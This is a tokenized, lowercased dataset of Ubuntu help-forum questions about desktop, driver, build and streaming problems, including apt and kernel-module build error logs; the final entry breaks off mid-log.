307828	will mir reduce usage of system resources ?	i have spent quite a lot of time searching for the answer to this question and have not found a definite answer yet . i was hoping that either someone directly involved with creating mir or someone very knowledgeable about it 's inner workings would be able to help answer my question . the situation : for some odd reason my laptop lags horribly with unity 3d & 2d ( i have tried all kinds of tweaks and stuff and nothing i have found works ) . i use gnome 3 and have no problems whatsoever with lag , but i wish i could run unity . the question : i was wondering if mir was going to use less system resources than the current incarnation of unity . should get my hopes up , or just resign myself to a lighter desktop on my laptop ? thank you !
307830	what are the official ubuntu derivatives ?	what are the official ubuntu derivatives ? how many are there ?
307835	setting qt5 qmake as default qt builder	by default qt4 is the default qt builder in ubuntu 12.10 , i want to know how can i make qt5 qmake as default qt builder . ps qt5 qmake installed in /usr/lib/x86_64-linux-gnu/qt5/bin/qmake
307836	pendrive install asks for cd	trying to install from usb on a win 8 machine . it boots from the pendrive usb fine , but when the dialogue gets past the language and keyboard select , it asks for the cd and wo n't go any further . how can i get around this ? trying to install server 12.04 . thanks !
307840	installed 64-bit ubuntu on 32-bit windows vista	i am not very knowledgeable about computing , so pardon me if i am asking a stupid question . i installed ubuntu on my 32-bit windows vista via http : //www.ubuntu.com/download/desktop/windows-installer so after installing , i realised that i have installed a 64-bit ubuntu . is that a problem , having a dual boot of 64-bit ubuntu and 32 bit windows vista ?
307841	how to restore old nautilus reaction to keyboard input	since ubuntu 13.04 nautilus behaves different when typing . before , the cursor moved to the file in current directory which matched the typed letters . since 13.04 , nautilus searches in all subdirectories . i do n't like this , because it makes keyboard navigation nearly impossible . how to restore the old behavior ?
307842	why does chrome not stay as the default browser in xubuntu 13.04 ?	if i go to settings manager > preferred applications and make chrome ( or chromium-browser ; there are entries for both ! ) the default browser , then logout or reboot and come back , the default browser is null again . the same happens if i click a url in another application ( eg thunderbird ) ; it says i have no default browser set . if i set it to chrome , it works for the session , but reverts to unset afterwards . is there some other place it must be set ?
307843	how to configure ubuntu 13.04 to shutdown when the power button is pressed	i would like my computer to shut down when i press the power button . without any questioning . first problem is , that a dialog pops up which i have to click . how to remove this ? second problem is , that when the current user is not sudoer and anoter user is logged in on a console , my computer does not shut down . instead the desktop user is just logged out . perhaps it is possible to bind the command shutdown -h now to the power button event shomehow ?
307856	can not start eclipse from unity launcher	i downloaded eclipse juno package , and extracted it to /opt directory . for installing it , i followed the steps given in this site - ubuntu help under the user installation section . i created the opt_eclipse.desktop file in /usr/share/applications/ directory . here is the content of my desktop file : [ desktop entry ] type=application name=eclipse comment=eclipse integrated development environment icon=eclipse exec=eclipse42 terminal=false categories=development ; ide ; java ; startupwmclass=eclipse x-desktop-file-install-version=0.20 then i installed the desktop file on unity using the following command , as given in this post : sudo desktop-file-install /usr/share/applications/opt_eclipse.desktop then i created the symbolic link using the below command : sudo ln -s /opt/eclipse/eclipse /usr/local/bin/eclipse42 i also moved the icon to the pixmaps folder using the below command : cp opt/eclipse/icon.xpm /usr/share/pixmaps/eclipse.xpm now , when i go to unity , i can find the eclipse icon . but , when i click it , nothing happens . it does n't get started . i 'm completely new to ubuntu . did i miss something out there ?
307857	ffserver troubleshooting . streaming video from ubuntu server	i have a raring ring-tail server , which i want to stream video from an attached usb webcam . i have followed this guide to install ffmpeg , ffserver , and numerous codecs . https : //ffmpeg.org/trac/ffmpeg/wiki/ubuntucompilationguide when i plug in the usb cameram this is output from sudo dmesg : [ 76830.776029 ] usb 1-4 : new high-speed usb device number 13 using ehci-pci [ 76831.124410 ] usb 1-4 : new usb device found , idvendor=046d , idproduct=081b [ 76831.124418 ] usb 1-4 : new usb device strings : mfr=0 , product=0 , serialnumber=2 [ 76831.124423 ] usb 1-4 : serialnumber : f51ea110 [ 76831.124732 ] uvcvideo : found uvc 1.00 device < unnamed > ( 046d:081b ) [ 76831.221227 ] input : uvc camera ( 046d:081b ) as /devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4:1.0/input/input15 [ 76832.228288 ] 13:3:3 : can not set freq 32000 to ep 0x86 my video output screen displays , but renders no video : http : //omh.umeche.maine.edu:8090/test.webm my test config file for ffsever is : http : //omh.umeche.maine.edu/tst.conf also , a status page : http : //omh.umeche.maine.edu:8090/status.html can anyone help me get video streaming from my usb web-cam connected to ubuntu server , streaming to a web-page ? really , i do n't care , what codec i use , as long as browser plugins are available , and i can get it to work . does anyone have experience with ffmpeg / ffserver ? can someone help me get this working ?
307864	how to install and run postal 2 on 13.04	i 'm new to linux . i have postal 2 but i do n't know how to install it . what file do i need to start ?
307865	hdmi connection is not detected	i have the samsung 530u3c ultrabook with intel hd4000 graphics . i have ubuntu 13.04 ( fresh install ) . the laptop is connected to the tv hdmi port , but it is n't detected by the laptop . the tv shows that it 's hdmi port is used . in windows everything works flawlessly : detection , image , sound . i also installed the intel drivers using intel linux graphics drivers application . do you have any idea what can i do next ?
307867	trying to uninstall fglrx-driver but xvba-va-driver has dependencies	i have been trying to uninstall fglrx- driver for quite a while now , but the more i try , the more i fail ; ) i actually don’t know how i installed it , but now i want to uninstall first , because i have to install some 32-bit libs , which are locked up by fglrx . when trying to uninstall , i get stuff like : flex @ neworld-li : ~ $ sudo apt-get purge fglrx* [ sudo ] password for flex : paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut . statusinformationen werden eingelesen ... . fertig hinweis : »fglrx-amdcccle-updates« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »xorg-driver-fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-driver-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-updates« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »glx-alternative-fglrx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-control-qt2« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-updates-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-glx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »xfree86-driver-fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-amdcccle« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-driver« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-control« wird für regulären ausdruck »fglrx*« gewählt . paket »fglrx-glx« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-control-qt2« ist nicht installiert , wird also auch nicht entfernt . paket »xfree86-driver-fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »xorg-driver-fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-amdcccle-updates« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-updates« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-updates-dev« ist nicht installiert , wird also auch nicht entfernt . paket »glx-alternative-fglrx« ist nicht installiert , wird also auch nicht entfernt . probieren sie »apt-get -f install« , um dies zu korrigieren : die folgenden pakete haben unerfüllte abhängigkeiten : xvba-va-driver : hängt ab von : fglrx-driver ( > = 1:10-9 ) oder fglrx ( > = 2:8.840 ) soll aber nicht installiert werden oder fglrx-updates ( > = 2:8.840 ) soll aber nicht installiert werden e : unerfüllte abhängigkeiten . versuchen sie »apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . flex @ neworld-li : ~ $ sudo apt-get remove -- auto-remove fglrx* paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut . statusinformationen werden eingelesen ... . fertig hinweis : »fglrx-amdcccle-updates« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »xorg-driver-fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-driver-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-updates« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »glx-alternative-fglrx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-control-qt2« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-updates-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-glx« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »xfree86-driver-fglrx-dev« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-amdcccle« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-driver« wird für regulären ausdruck »fglrx*« gewählt . hinweis : »fglrx-control« wird für regulären ausdruck »fglrx*« gewählt . paket »fglrx-glx« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-control-qt2« ist nicht installiert , wird also auch nicht entfernt . paket »xfree86-driver-fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »xorg-driver-fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-amdcccle-updates« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-dev« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-updates« ist nicht installiert , wird also auch nicht entfernt . paket »fglrx-updates-dev« ist nicht installiert , wird also auch nicht entfernt . paket »glx-alternative-fglrx« ist nicht installiert , wird also auch nicht entfernt . probieren sie »apt-get -f install« , um dies zu korrigieren : die folgenden pakete haben unerfüllte abhängigkeiten : xvba-va-driver : hängt ab von : fglrx-driver ( > = 1:10-9 ) oder fglrx ( > = 2:8.840 ) soll aber nicht installiert werden oder fglrx-updates ( > = 2:8.840 ) soll aber nicht installiert werden e : unerfüllte abhängigkeiten . versuchen sie »apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . flex @ neworld-li : ~ $ sudo apt-get install fglrx-opdates fglrx fglrx-driver paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut . statusinformationen werden eingelesen ... . fertig paket fglrx-driver ist ein virtuelles paket , das bereitgestellt wird von : fglrx-updates 2:9.012-0ubuntu1 fglrx 2:9.010-0ubuntu3 sie sollten eines explizit zum installieren auswählen . e : paket fglrx-opdates kann nicht gefunden werden . e : für paket »fglrx-driver« existiert kein installationskandidat . i hope someone is able to read the german stuff , if not i can translate ; ) thanks for your help !
307868	how to install logitech mouse with ltunify ?	trying to install code to let logitech unifying software install so my mouse will work on my new ubuntu laptop . i think i found the program ltunify but ca n't get it to work . i have ubuntu 12.04 lts installed and i am not a programmer . initially i tried to follow the instructions from the link - is logitech 's unifying receiver supported ? i followed the quick install instructions typing in all four lines of code . it appears to load and create the ltunify directory which is says is not empty . it appears to contain hidpp20.c keyboard.txt notes.txt readme.txt usbmon.awk hidraw.c ltunify.c read-dev-usbmon.c registers.txt . when i enter sudo ltunify pair i get a command not found error . i have rebooted machine . thanks !
307871	can not install the rtl8188c driver on 13.04	after running install.sh i get an error at the end . any ideas ? realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105.tar.gz rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/clean rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ht.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_sreset.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/recv_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/generic.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/little_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swabb.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/swab.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/byteorder/big_endian.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_osintf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_pwrctrl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192detesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_version.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ethernet.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_br_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_qos.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_p2p.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/xmit_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_ioctl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/pci_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mlme_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/h2clbk.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_vendor_req.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_eeprom.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/farray.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphycfg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ioctl_cfg80211.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_dm.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/if_ether.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_security.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_rtl.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wlan_bssdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dphyreg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/wifi.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192d_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_event.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dehwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192cuhwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/nic_spec.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_intf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_ce.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_ops_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/circ_buf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_byteorder.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_xmit.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192duhwimg_wowlan.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_set.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_dm.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mp_custom_oid.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ip.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_query.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal_init.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_conf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dutesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/autoconf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_ce_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_efuse.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_io.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/cmd_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sta_info.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_iol.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_debug.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_android.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/basic_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_phy_regdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_rf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_eeprom.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_io.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_br_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.tmp_rtw_wlan_util.o rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp_ioctl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_iol.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_p2p.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_set.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_debug.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ieee80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_pwrctrl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_security.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_query.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_rtl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_sta_mgt.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_wlan_util.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.rtw_wlan_util.o.d rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/rtw_efuse.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/makefile rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ifcfg-wlan0 rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/wlan0dhcp rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/osdep_service.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/pci_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/usb_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_cfg80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/xmit_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/mlme_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/os_intfs.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/recv_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/sdio_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/rtw_android.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/kconfig rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_sreset.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_dm.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_phycfg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_ce.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_led.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_halinit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg_wowlan.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_xp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rxdesc.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rf6052.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.8.0-23-generic/build m=/home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-23-generic' cc [ m ] /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o in file included from /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:23:0 : /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h : in function ‘thread_enter’ : /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h:575:2 : error : implicit declaration of function ‘daemonize’ [ -werror=implicit-function-declaration ] in file included from /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h:69:0 , from /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:24 : /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h : in function ‘rxmem_to_recvframe’ : /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/arcizo/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ 